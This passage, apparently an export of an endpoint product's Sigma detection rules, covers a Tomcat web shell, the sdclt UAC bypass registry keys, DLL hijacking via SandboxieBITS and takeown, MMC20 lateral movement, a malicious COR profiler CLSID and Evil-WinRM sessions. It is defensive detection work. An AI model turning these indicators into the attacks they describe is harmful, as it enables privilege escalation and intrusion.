"rule_description": "Detects the execution of a suspicious shell by the Tomcat web server software likely related to a web shell or a command injection via a vulnerable application.\nAdversaries may backdoor web servers with web shells to establish persistent access to systems.\nIt is recommended to verify the legitimacy of this command and check any other command executed by the Tomcat server.\n",
"rule_creation_date": "2021-09-17",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4442a1d3-9bb5-49a9-923a-a787f259e6ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.084381Z",
"creation_date": "2026-03-23T11:45:34.084383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.084388Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_sdclt.yml",
"content": "title: UAC Bypass via sdclt Prepared\nid: 4442a1d3-9bb5-49a9-923a-a787f259e6ff\ndescription: |\n Detects the preparation of the sdclt.exe UAC bypass, involving the setting of multiple registry keys.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://pentestlab.blog/2017/06/09/uac-bypass-sdclt/\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/11\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\folder\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\exefile\\shell\\runas\\command\\IsolatedCommand'\n - 'HKU\\\\*\\folder\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\exefile\\\\*SymbolicLinkValue'\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)'\n filter_is_empty:\n Details:\n - '(Empty)'\n - ''\n\n selection_rename:\n EventType:\n - 'RenameKey'\n - 'RenameValue'\n NewName:\n - 'HKU\\\\*_Classes\\folder\\\\*'\n - 'HKU\\\\*_Classes\\exefile\\\\*'\n - 'HKU\\\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe'\n\n exclusion_explorer:\n Details: '%systemroot%\\explorer.exe'\n\n condition: ((selection_set_value and not 1 of filter_*) or selection_rename) and not 1 of exclusion_*\nlevel: 
high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4442a1d3-9bb5-49a9-923a-a787f259e6ff",
"rule_name": "UAC Bypass via sdclt Prepared",
"rule_description": "Detects the preparation of the sdclt.exe UAC bypass, involving the setting of multiple registry keys.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-09-11",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "446938b0-0a64-4dac-83f6-62f25e5d6617",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295053Z",
"creation_date": "2026-03-23T11:45:35.295057Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295063Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1087/001/",
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_last_macos.yml",
"content": "title: Last Logged-in Users Discovered via Last (macOS)\nid: 446938b0-0a64-4dac-83f6-62f25e5d6617\ndescription: |\n Detects the execution of the last command.\n Attackers may use it during the discovery phase of an attack to retrieve the most recent login of all users or of given users.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1087/001/\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.001\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/last'\n ParentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage: '/Library/Application Support/LANDesk/bin/ldapm'\n\n exclusion_meraki:\n ParentCommandLine: '/Library/Application Support/Meraki/m_agent --verbose --log /var/log/m_agent.log --pid-file /var/run/m_agent.pid'\n\n exclusion_ocsinventory:\n - ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n - GrandparentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_fusion_inventory:\n - ParentImage: '/opt/fusioninventory-agent/bin/perl'\n - GrandparentImage: '/opt/fusioninventory-agent/bin/perl'\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_landesk:\n ParentImage: '/Library/Application Support/LANDesk/bin/ldiscan'\n\n exclusion_hagent:\n - GrandparentImage: '/Library/Application Support/HN/base/bin/HNagent'\n - 
CurrentDirectory: '/Library/Application Support/HN/base/bin'\n\n exclusion_meshagent:\n ParentImage|startswith: '/usr/local/mesh_services/'\n\n exclusion_ivanti:\n ParentImage: '/usr/local/com.ivanti.cloud.agent/IvantiAgent/bin/stagentd.app/Contents/MacOS/stagentd'\n\n exclusion_adobe:\n ParentCommandLine|startswith: '/bin/bash /tmp/PKInstallSandbox.??????/Scripts/com.adobe.acrobat.*.??????/preinstall '\n\n exclusion_dotnet:\n ParentImage: '/usr/local/share/dotnet/dotnet'\n\n exclusion_atera:\n ParentImage: '/Library/Application Support/com.atera.ateraagent/Packages/AgentPackageAgentInformation/AgentPackageAgentInformationApp.app/Contents/MacOS/AgentPackageAgentInformationApp'\n\n exclusion_manageengine:\n ParentImage: '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n\n exclusion_globalprotect:\n ParentImage: '/Applications/GlobalProtect.app/Contents/MacOS/GlobalProtect'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "446938b0-0a64-4dac-83f6-62f25e5d6617",
"rule_name": "Last Logged-in Users Discovered via Last (macOS)",
"rule_description": "Detects the execution of the last command.\nAttackers may use it during the discovery phase of an attack to retrieve the most recent login of all users or of given users.\nIt is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\nIf this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "44948abc-3053-4899-af2a-e5a77e12bbba",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097813Z",
"creation_date": "2026-03-23T11:45:34.097815Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097819Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sandboxiebits.yml",
"content": "title: DLL Hijacking via SandboxieBITS.exe\nid: 44948abc-3053-4899-af2a-e5a77e12bbba\ndescription: |\n Detects potential Windows DLL Hijacking via SandboxieBITS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'SandboxieBITS.exe'\n ImageLoaded|endswith: '\\SbieDll.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Sandboxie'\n - '?:\\Program Files (x86)\\Sandboxie'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Sandboxie'\n - '?:\\Program Files (x86)\\Sandboxie'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'SANDBOXIE L.T.D'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "44948abc-3053-4899-af2a-e5a77e12bbba",
"rule_name": "DLL Hijacking via SandboxieBITS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via SandboxieBITS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "44b1b40e-cd1b-4a5a-a147-ed7b17206a94",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076726Z",
"creation_date": "2026-03-23T11:45:34.076728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076732Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/",
"https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model",
"https://attack.mitre.org/techniques/T1021/003/"
],
"name": "t1021_003_lateral_movement_via_mmc20.yml",
"content": "title: Possible Lateral Movement via MMC20.Application\nid: 44b1b40e-cd1b-4a5a-a147-ed7b17206a94\ndescription: |\n Detects processes spawned by the MMC (Microsoft Management Console) that could be the result of a lateral movement obtained via DCOM (Distributed Component Object Model) using the MMC20 Application COM Object.\n Attackers can use this technique to execute remote commands on a target host, as part of lateral movement.\n It is recommended to investigate the spawned process to look for malicious actions and content.\nreferences:\n - https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/\n - https://www.ired.team/offensive-security/lateral-movement/t1175-distributed-component-object-model\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/05/16\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine: '?:\\Windows\\system32\\mmc.exe -Embedding'\n GrandparentCommandLine: '?:\\Windows\\system32\\svchost.exe -k DcomLaunch'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "44b1b40e-cd1b-4a5a-a147-ed7b17206a94",
"rule_name": "Possible Lateral Movement via MMC20.Application",
"rule_description": "Detects processes spawned by the MMC (Microsoft Management Console) that could be the result of a lateral movement obtained via DCOM (Distributed Component Object Model) using the MMC20 Application COM Object.\nAttackers can use this technique to execute remote commands on a target host, as part of lateral movement.\nIt is recommended to investigate the spawned process to look for malicious actions and content.\n",
"rule_creation_date": "2023-05-16",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1021.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "450c62c8-d09c-4677-9e8a-fbea161fe78b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076194Z",
"creation_date": "2026-03-23T11:45:34.076196Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076201Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/setting-up-a-profiling-environment",
"https://github.com/OmerYa/Invisi-Shell",
"https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html",
"https://attack.mitre.org/techniques/T1574/012/"
],
"name": "t1574_012_suspicious_cor_profiler.yml",
"content": "title: Suspicious COR Profiler CLSID Installed\nid: 450c62c8-d09c-4677-9e8a-fbea161fe78b\ndescription: |\n Detects the installation of a COR Profiler in the system registry.\n COR (Converged Open Runtimes) Profiler is a set of tools used for profiling .NET applications, allowing for the instrumentation and analysis of running .NET processes.\n It can also be misused by attackers to inject arbitrary code when a .NET program is launched, serving as a persistence mechanism.\n This rule targets a specific CLSID (Class identifier) known to be associated with malicious activities or tools using a COR Profiler (see references).\n It is recommended to investigate the source of the registry entries, analyze process behavior linked to the detected CLSID and monitor for unusual .NET execution patterns.\nreferences:\n - https://learn.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/setting-up-a-profiling-environment\n - https://github.com/OmerYa/Invisi-Shell\n - https://0xdf.gitlab.io/2019/03/15/htb-ethereal-cor.html\n - https://attack.mitre.org/techniques/T1574/012/\ndate: 2020/10/11\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1574.012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*_Classes\\CLSID\\{cf0d821e-299b-5307-a3d8-b283c03916db}\\InprocServer32\\(Default)'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "450c62c8-d09c-4677-9e8a-fbea161fe78b",
"rule_name": "Suspicious COR Profiler CLSID Installed",
"rule_description": "Detects the installation of a COR Profiler in the system registry.\nCOR (Converged Open Runtimes) Profiler is a set of tools used for profiling .NET applications, allowing for the instrumentation and analysis of running .NET processes.\nIt can also be misused by attackers to inject arbitrary code when a .NET program is launched, serving as a persistence mechanism.\nThis rule targets a specific CLSID (Class identifier) known to be associated with malicious activities or tools using a COR Profiler (see references).\nIt is recommended to investigate the source of the registry entries, analyze process behavior linked to the detected CLSID and monitor for unusual .NET execution patterns.\n",
"rule_creation_date": "2020-10-11",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4522741d-31ae-4866-8abe-96b3f416fc86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075865Z",
"creation_date": "2026-03-23T11:45:34.075867Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075881Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_takeown.yml",
"content": "title: DLL Hijacking via takeown.exe\nid: 4522741d-31ae-4866-8abe-96b3f416fc86\ndescription: |\n Detects potential Windows DLL Hijacking via takeown.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'takeown.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4522741d-31ae-4866-8abe-96b3f416fc86",
"rule_name": "DLL Hijacking via takeown.exe",
"rule_description": "Detects potential Windows DLL Hijacking via takeown.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "45350ac4-ffd2-4ac5-b57d-819e6c36921a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077180Z",
"creation_date": "2026-03-23T11:45:34.077182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077187Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Hackplayers/evil-winrm",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_evil_winrm_powershell_execution.yml",
"content": "title: Evil-WinRM PowerShell Session Started\nid: 45350ac4-ffd2-4ac5-b57d-819e6c36921a\ndescription: |\n Detects a PowerShell activity by the Windows Remote Management (WinRM) process related to the execution of Evil-WinRM.\n Adversaries can use valid accounts and the Evil-WinRM tool to access endpoints via WinRM and perform lateral movement.\n It is recommended to investigate other PowerShell commands executed by the detected process and its children as well as any malicious actions they could have taken.\nreferences:\n - https://github.com/Hackplayers/evil-winrm\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2025/10/21\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1087\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.evil-winrm\n - classification.Windows.HackTool.evil-winrm-py\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n ProcessImage:\n - '?:\\Windows\\System32\\wsmprovhost.exe'\n - '?:\\Windows\\SysWOW64\\wsmprovhost.exe'\n\n # https://github.com/Hackplayers/evil-winrm\n selection_evilwinrm:\n PowershellCommand|contains|all:\n - '(get-location).path'\n - 'if (!$?)'\n\n # https://github.com/adityatelange/evil-winrm-py\n selection_evilwinrmpy:\n PowershellCommand: '$pwd.Path'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "45350ac4-ffd2-4ac5-b57d-819e6c36921a",
"rule_name": "Evil-WinRM PowerShell Session Started",
"rule_description": "Detects a PowerShell activity by the Windows Remote Management (WinRM) process related to the execution of Evil-WinRM.\nAdversaries can use valid accounts and the Evil-WinRM tool to access endpoints via WinRM and perform lateral movement.\nIt is recommended to investigate other PowerShell commands executed by the detected process and its children as well as any malicious actions they could have taken.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1087"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4538136c-2f3b-423b-ab28-46ea322d43a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618278Z",
"creation_date": "2026-03-23T11:45:34.618280Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618284Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.synacktiv.com/publications/windows-secrets-extraction-a-summary",
"https://attack.mitre.org/techniques/T1003/",
"https://attack.mitre.org/techniques/T1016/002/"
],
"name": "t1003_netsh_show_wlan_keys.yml",
